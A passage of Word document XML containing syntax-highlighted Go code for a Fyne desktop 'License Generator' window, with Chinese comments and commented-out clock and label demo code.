          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>可校验数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>//test.Type(in, "Andy")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>//if out.Text != "Hello Andy!" {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>fmt.Println("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>不对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>//}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>IpAddressOut</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>IpAddressIn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>TimeOut</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>TimeIn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>LicenseLabel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>LicenseOut</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>}</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br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">func </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFC66D"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>() {</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>创建主窗口，写控件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>title</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">a := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>app</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>New</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>()</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t>w := a.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>NewWindow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"License Generator"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>)</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">//// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>添加子空间，新增内容</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>//w.SetContent(widget.NewLabel("Hello World!22222222"))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">//// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>添加子控件，自动更新时间</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>//clock := widget.NewLabel("")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>//updateTime(clock)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>//w.SetContent(clock)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>//go func() {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>每秒更新</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>for range time.Tick(time.Second) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>updateTime(clock)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>//}()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>使用垂直盒子容器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
